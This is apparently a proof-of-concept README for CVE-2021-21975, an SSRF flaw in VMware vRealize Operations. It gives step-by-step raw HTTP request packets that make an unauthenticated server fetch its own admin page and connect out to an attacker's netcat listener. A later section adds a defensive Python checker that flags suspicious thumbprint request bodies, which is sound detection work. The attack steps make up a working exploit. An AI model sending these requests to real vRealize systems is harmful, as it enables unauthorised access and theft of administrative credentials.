## Impacted Products

- VMware vRealize Operations 8.3.0, 8.2.0, 8.1.1, 8.1.0, 7.5.0
- VMware Cloud Foundation 4.x, 3.x
- vRealize Suite Lifecycle Manager 8.x

## Description

On March 31, 2021, VMware published security advisory VMSA-2021-0004 covering CVE-2021-21975 and CVE-2021-21983. The issues are rated high severity, with a score of 8.6.

CVE-2021-21975: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.

CVE-2021-21983: An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying Photon operating system.

## Vulnerability

**Step 1**: Log out.

![without_login](./img/without_login.png)

**Step 2**: Then visit /casa/nodes/thumbprints, capture the request with Burp Suite, and modify it into the following request, which makes the server itself request the admin login page:

```http
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.203.155
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 36

["127.0.0.1:443/admin/login.action"]
```

![request](img/request.png)

**Step 3**: When dnslog was used to verify the SSRF, no callback was received for a long time, so nc had to be used for verification instead. The constructed request packet is as follows:

```http
POST /casa/nodes/thumbprints HTTP/1.1
Host: 192.168.203.155
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/json;charset=UTF-8
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 23

["192.168.202.86:4444"]
```

![request2](img/request2.png)

## Reference

https://kb.vmware.com/s/article/83210

https://www.vmware.com/security/advisories/VMSA-2021-0004.html

https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml
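As an added example that is not part of this repository, the following Python script shows how a defender could review captured requests to /casa/nodes/thumbprints, the endpoint both request packets above target, and flag body entries that do not look like a legitimate intra-cluster thumbprint lookup: a missing session, an entry that carries a URL path, a host that is not one of the cluster's own nodes, or an unexpected port. The cluster node allowlist, the expected port and the three sample requests are constructed for the example; two of the sample bodies mirror the PoC requests above. Patching per VMSA-2021-0004 is the fix; this check is for log review or a WAF rule while patching is pending.

```python
import json
from dataclasses import dataclass
from typing import List

# Hosts that may legitimately appear in a thumbprint lookup: the vROps
# cluster's own nodes. Hypothetical addresses for this example; a real
# deployment would load them from its cluster configuration.
CLUSTER_NODES = {"192.168.203.155", "192.168.203.156"}
EXPECTED_PORT = "443"
THUMBPRINT_PATH = "/casa/nodes/thumbprints"


@dataclass
class Finding:
    target: str  # the body entry the finding refers to ("-" for request-level findings)
    reason: str


def parse_http_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def check_thumbprint_request(raw: str) -> List[Finding]:
    """Flag /casa/nodes/thumbprints requests that do not look like a
    legitimate intra-cluster thumbprint lookup."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or path.split("?", 1)[0] != THUMBPRINT_PATH:
        return []

    findings = []
    # The PoC above is sent after logging out: a request reaching this
    # endpoint with neither a session cookie nor an Authorization header
    # is itself worth recording.
    if "authorization" not in headers and "cookie" not in headers:
        findings.append(Finding("-", "request carries no session or Authorization header"))

    try:
        targets = json.loads(body)
    except json.JSONDecodeError:
        findings.append(Finding("-", "body is not valid JSON"))
        return findings
    if not isinstance(targets, list):
        findings.append(Finding("-", "body is not a JSON array of host:port strings"))
        return findings

    for entry in targets:
        if not isinstance(entry, str):
            findings.append(Finding(repr(entry), "non-string entry"))
            continue
        hostport, slash, _rest = entry.partition("/")
        host, _, port = hostport.partition(":")
        # A legitimate lookup names a node as host:port; an entry with a
        # path component steers the server to a specific URL.
        if slash:
            findings.append(Finding(entry, "entry contains a URL path"))
        if host not in CLUSTER_NODES:
            findings.append(Finding(entry, f"host {host} is not a known cluster node"))
        if port and port != EXPECTED_PORT:
            findings.append(Finding(entry, f"unexpected port {port}"))
    return findings


def reasons(raw: str) -> List[str]:
    """Convenience wrapper returning only the finding reasons, in order."""
    return [f.reason for f in check_thumbprint_request(raw)]


# Constructed sample requests (not captured traffic): one benign lookup plus
# trimmed copies of the two PoC bodies shown in the README.
BENIGN_REQUEST = (
    "POST /casa/nodes/thumbprints HTTP/1.1\r\n"
    "Host: 192.168.203.155\r\n"
    "Authorization: Bearer PLACEHOLDER-TOKEN\r\n"
    "Content-Type: application/json;charset=UTF-8\r\n"
    "\r\n"
    '["192.168.203.156:443"]'
)
LOOPBACK_REQUEST = (
    "POST /casa/nodes/thumbprints HTTP/1.1\r\n"
    "Host: 192.168.203.155\r\n"
    "Content-Type: application/json;charset=UTF-8\r\n"
    "\r\n"
    '["127.0.0.1:443/admin/login.action"]'
)
EXTERNAL_REQUEST = (
    "POST /casa/nodes/thumbprints HTTP/1.1\r\n"
    "Host: 192.168.203.155\r\n"
    "Content-Type: application/json;charset=UTF-8\r\n"
    "\r\n"
    '["192.168.202.86:4444"]'
)

if __name__ == "__main__":
    for name, req in [("benign", BENIGN_REQUEST),
                      ("loopback", LOOPBACK_REQUEST),
                      ("external", EXTERNAL_REQUEST)]:
        print(name, reasons(req))
```

The allowlist check is the one that matters most: a thumbprint lookup has no business naming loopback, an arbitrary internal host or an attacker-controlled address, so any host outside the cluster's own nodes should be treated as an SSRF attempt regardless of whether the request was authenticated.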